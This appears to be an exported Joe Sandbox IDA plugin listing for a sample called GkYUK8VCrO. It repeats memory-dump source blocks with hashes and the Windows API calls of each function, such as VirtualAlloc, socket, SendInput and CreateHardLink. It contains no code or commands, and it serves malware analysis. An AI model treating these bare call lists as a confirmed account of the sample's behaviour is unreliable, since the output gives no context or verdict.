                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: AddressLibraryLoadProc
                                • String ID: RegDeleteKeyExW$advapi32.dll
                                • API String ID: 2574300362-4033151799
                                • Opcode ID: debc9a22c59059d04991a3007949fbabd901f7e33c3388fa57de8aa3c12d7061
                                • Instruction ID: 4c6855751624977a2d31913d755e54af88b40b87ca99427ea84e83203e832859
                                • Opcode Fuzzy Hash: debc9a22c59059d04991a3007949fbabd901f7e33c3388fa57de8aa3c12d7061
                                • Instruction Fuzzy Hash: 35D01231510723CFD7305F35D818A67B6F4EF15752F118CB9A889D6560DB70C4C0C650
                                APIs
                                • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00B19009,?,00B2F910), ref: 00B19403
                                • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00B19415
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: AddressLibraryLoadProc
                                • String ID: GetModuleHandleExW$kernel32.dll
                                • API String ID: 2574300362-199464113
                                • Opcode ID: 11925f604c7c6b23795f7410b23ffbbe67e3b28a696ec56f6aafbd3d7f2b709c
                                • Instruction ID: ace1f6759e5a6977dadb332eaa69130803bff78d862528173bc6756915578f48
                                • Opcode Fuzzy Hash: 11925f604c7c6b23795f7410b23ffbbe67e3b28a696ec56f6aafbd3d7f2b709c
                                • Instruction Fuzzy Hash: F3D01734510723CFD7309F31DA1979776E5EF09752B51C8BAA886E6660EA70E8C1CA50
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4eef3e53ee2302b32f251418c8334fcf3634f3fd590ed15d9468c540d9186dd6
                                • Instruction ID: ce7e9906d109e4b6b6bd6fb682b8d6cac65b74c889d9b438a07312d0c5edf253
                                • Opcode Fuzzy Hash: 4eef3e53ee2302b32f251418c8334fcf3634f3fd590ed15d9468c540d9186dd6
                                • Instruction Fuzzy Hash: 2EC14A75A0421AEFCB14DF98C884ABEBBB5FF48750B118598F905EB251D770EE81CB90
                                APIs
                                • CharLowerBuffW.USER32(?,?), ref: 00B1E3D2
                                • CharLowerBuffW.USER32(?,?), ref: 00B1E415
                                  • Part of subcall function 00B1DAB9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00B1DAD9
                                • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00B1E615
                                • _memmove.LIBCMT ref: 00B1E628
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: BuffCharLower$AllocVirtual_memmove
                                • String ID:
                                • API String ID: 3659485706-0
                                • Opcode ID: eb528196aac534903a6c9e50e558ec5dec12750a3478106aab59e2cf446b3c71
                                • Instruction ID: b101124ec9d9ec40cc3cdaf3a9eacefa3cb3fd89e6e9a1404ebc0abef675e7aa
                                • Opcode Fuzzy Hash: eb528196aac534903a6c9e50e558ec5dec12750a3478106aab59e2cf446b3c71
                                • Instruction Fuzzy Hash: 85C16C71608301DFC714DF28C48096ABBE5FF89714F5489ADF8A99B351D731E986CB82
                                APIs
                                • CoInitialize.OLE32(00000000), ref: 00B183D8
                                • CoUninitialize.OLE32 ref: 00B183E3
                                  • Part of subcall function 00AFDA5D: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00AFDAC5
                                • VariantInit.OLEAUT32(?), ref: 00B183EE
                                • VariantClear.OLEAUT32(?), ref: 00B186BF
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                • String ID:
                                • API String ID: 780911581-0
                                • Opcode ID: df30092202b170553949f4a5154416e065db942646784fd346934ef894398baa
                                • Instruction ID: 731b874c4bafc4d2e315b9fec2762ec90ec45cc51b34b788feb3c78fd5c7c686
                                • Opcode Fuzzy Hash: df30092202b170553949f4a5154416e065db942646784fd346934ef894398baa
                                • Instruction Fuzzy Hash: DFA136752047019FCB10DF24C981A6AB7E5FF89364F54889DF99A9B3A1CB31ED44CB82
                                APIs
                                • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00B32C7C,?), ref: 00AF7C32
                                • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00B32C7C,?), ref: 00AF7C4A
                                • CLSIDFromProgID.OLE32(?,?,00000000,00B2FB80,000000FF,?,00000000,00000800,00000000,?,00B32C7C,?), ref: 00AF7C6F
                                • _memcmp.LIBCMT ref: 00AF7C90
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: FromProg$FreeTask_memcmp
                                • String ID:
                                • API String ID: 314563124-0
                                • Opcode ID: 9fecef371aa3efc5dd1a67aecf4852e69af36c874df674ccbdd2b6fdcda04bd5
                                • Instruction ID: 7da585acfea865391deee75bf0746bd56f9ffe1b1fc578c2e834a089f545764b
                                • Opcode Fuzzy Hash: 9fecef371aa3efc5dd1a67aecf4852e69af36c874df674ccbdd2b6fdcda04bd5
                                • Instruction Fuzzy Hash: EE81D675A00109EFCB04DFD4C984EAEB7B9FF89315F2045A8F516AB250DB71AE06CB60
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: Variant$AllocClearCopyInitString
                                • String ID:
                                • API String ID: 2808897238-0
                                • Opcode ID: 189422963c4f72046c22e5329cef56ca352850f71e2da5893fabe16b21c87526
                                • Instruction ID: e1539318b8a6a7bb93d84f754dece82202c651ba2aa873cc4f3af0b303a79079
                                • Opcode Fuzzy Hash: 189422963c4f72046c22e5329cef56ca352850f71e2da5893fabe16b21c87526
                                • Instruction Fuzzy Hash: 4251843560430A9ADB24AFA5D895A7EB3F5AF49310F20882FF656CB291DF709880DB15
                                APIs
                                • GetWindowRect.USER32(0112DB10,?), ref: 00B29AD2
                                • ScreenToClient.USER32(00000002,00000002), ref: 00B29B05
                                • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00B29B72
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: Window$ClientMoveRectScreen
                                • String ID:
                                • API String ID: 3880355969-0
                                • Opcode ID: 7e2f94055ba5c0f6660f8be93f98fac187371732c1f151349305883e585ae231
                                • Instruction ID: bc44d9cdcf88dd0162fc8511362ff51f9d290240b3c5495d727cfddd2f75c392
                                • Opcode Fuzzy Hash: 7e2f94055ba5c0f6660f8be93f98fac187371732c1f151349305883e585ae231
                                • Instruction Fuzzy Hash: 91512F34A00219EFCF14DF68E9849AE7BF5FF55720F1082A9F8599B2A0D730AD41CB90
                                APIs
                                • socket.WSOCK32(00000002,00000002,00000011), ref: 00B16CE4
                                • WSAGetLastError.WSOCK32(00000000), ref: 00B16CF4
                                  • Part of subcall function 00AA9997: __itow.LIBCMT ref: 00AA99C2
                                  • Part of subcall function 00AA9997: __swprintf.LIBCMT ref: 00AA9A0C
                                • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00B16D58
                                • WSAGetLastError.WSOCK32(00000000), ref: 00B16D64
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: ErrorLast$__itow__swprintfsocket
                                • String ID:
                                • API String ID: 2214342067-0
                                • Opcode ID: 656319a65e00a1ba349b6952e05c175ec18404bf5736d2d1ebe5361b7dfc54f3
                                • Instruction ID: 06b6e1cdf58cd36e3592928e98fa33b8d85dcfbe472471257010e6b1d79fa27a
                                • Opcode Fuzzy Hash: 656319a65e00a1ba349b6952e05c175ec18404bf5736d2d1ebe5361b7dfc54f3
                                • Instruction Fuzzy Hash: 2F41B275B40200AFEB20AF24DD86F7A77E5DB09B14F448068FA599F2D2DB759C018B91
                                APIs
                                • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00B2F910), ref: 00B167BA
                                • _strlen.LIBCMT ref: 00B167EC
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: _strlen
                                • String ID:
                                • API String ID: 4218353326-0
                                • Opcode ID: c5d85efc2e9308a6b7fb28a9e6959e620810a1bd1e092ae80f96111d57697055
                                • Instruction ID: 69adac35af4f726b944a4eef433a6a60df35e3d516698f08ef28e8adb2472025
                                • Opcode Fuzzy Hash: c5d85efc2e9308a6b7fb28a9e6959e620810a1bd1e092ae80f96111d57697055
                                • Instruction Fuzzy Hash: BF416D31A00104ABCB14EBA4DDD5EFEB7E9AF49354F5481A9F91A9B2D2DB30AD80C750
                                APIs
                                • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00B0BB09
                                • GetLastError.KERNEL32(?,00000000), ref: 00B0BB2F
                                • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00B0BB54
                                • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00B0BB80
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: CreateHardLink$DeleteErrorFileLast
                                • String ID:
                                • API String ID: 3321077145-0
                                • Opcode ID: a12c5afa8eae878567521c74dc421571a30d0881cd5c8e3272c47ea5150a5f49
                                • Instruction ID: ea7db7d5e4c22a9bf0ee0de9c35e6618afe2457cbf35d60b9a320bd788460a1b
                                • Opcode Fuzzy Hash: a12c5afa8eae878567521c74dc421571a30d0881cd5c8e3272c47ea5150a5f49
                                • Instruction Fuzzy Hash: D741E839600611DFCB21EF15C685A5EBBE1EF4A310B198499E84A9B7B2CB35FD01CB91
                                APIs
                                • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00B28B4D
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: InvalidateRect
                                • String ID:
                                • API String ID: 634782764-0
                                • Opcode ID: c1ee6d38f6b6acdf71c3e3418d825a99b913ba539cab5b0641fc55d5ef828f53
                                • Instruction ID: ee0d5adc5f7efbf67ad246c17595e5262fa12556f3f2cc1de06cc3735b52835b
                                • Opcode Fuzzy Hash: c1ee6d38f6b6acdf71c3e3418d825a99b913ba539cab5b0641fc55d5ef828f53
                                • Instruction Fuzzy Hash: 4831EA74602224BFEF209F18EC9DFA937E5EB09310F14459AFA59D72E0CF3699419B81
                                APIs
                                • ClientToScreen.USER32(?,?), ref: 00B2AE1A
                                • GetWindowRect.USER32(?,?), ref: 00B2AE90
                                • PtInRect.USER32(?,?,00B2C304), ref: 00B2AEA0
                                • MessageBeep.USER32(00000000), ref: 00B2AF11
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: Rect$BeepClientMessageScreenWindow
                                • String ID:
                                • API String ID: 1352109105-0
                                • Opcode ID: 2fb16b166151445584309618a0a727a96b5dab3c4b640e228a958811afb97fd9
                                • Instruction ID: 8a703196c29ada66a619ad59fb5f5fd893e588137389d197bf4ac6ee43b13fd3
                                • Opcode Fuzzy Hash: 2fb16b166151445584309618a0a727a96b5dab3c4b640e228a958811afb97fd9
                                • Instruction Fuzzy Hash: C1418070600225DFCB11EF68E884B69BBF5FB88350F2581E9E41CDB255D730A902CF92
                                APIs
                                • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00B01037
                                • SetKeyboardState.USER32(00000080,?,00000001), ref: 00B01053
                                • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00B010B9
                                • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00B0110B
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: KeyboardState$InputMessagePostSend
                                • String ID:
                                • API String ID: 432972143-0
                                • Opcode ID: e23478369b8d78cba537c9e4fe421b3d175c95aad0b696d73a4a2c3e26da9dd4
                                • Instruction ID: 500d80ad01a3fe0f8b4e6d39f31a623dd223dab1aa3644dd995d652e01e2175b
                                • Opcode Fuzzy Hash: e23478369b8d78cba537c9e4fe421b3d175c95aad0b696d73a4a2c3e26da9dd4
                                • Instruction Fuzzy Hash: B7313730E40688AEFB388B6D8C05BFABFF9EB45310F0446AAE5C1521D1E37589C19751
                                APIs
                                • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00B01176
                                • SetKeyboardState.USER32(00000080,?,00008000), ref: 00B01192
                                • PostMessageW.USER32(00000000,00000101,00000000), ref: 00B011F1
                                • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00B01243
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: KeyboardState$InputMessagePostSend
                                • String ID:
                                • API String ID: 432972143-0
                                • Opcode ID: 7438c2dc16ebe30672b9873443b37679bc08dbac33f7122932227e45e6cf6f9d
                                • Instruction ID: 2cca0d00b7bec687f544d817a54e1542cb7456e4b15befb9ad62a95e70349064
                                • Opcode Fuzzy Hash: 7438c2dc16ebe30672b9873443b37679bc08dbac33f7122932227e45e6cf6f9d
                                • Instruction Fuzzy Hash: 80310530A40608AAEF3D9A6D8804BFABFFAEB59314F044B9AF581A21D1C3348D959751
                                APIs
                                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00AD644B
                                • __isleadbyte_l.LIBCMT ref: 00AD6479
                                • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00AD64A7
                                • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00AD64DD
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                • String ID:
                                • API String ID: 3058430110-0
                                • Opcode ID: d655cdb0c1069e7a7e7402d94cf074950d0e52c4e1105c8054c18ea889b80aeb
                                • Instruction ID: 390c806574fe4e925d35396308b8a1e9dc2b081d6340148e103bd848f443ed98
                                • Opcode Fuzzy Hash: d655cdb0c1069e7a7e7402d94cf074950d0e52c4e1105c8054c18ea889b80aeb
                                • Instruction Fuzzy Hash: 2431CFB1600246AFDF218F65CA45BBA7BB5FF40310F15842AE866872A1EB31D891DB90
                                APIs
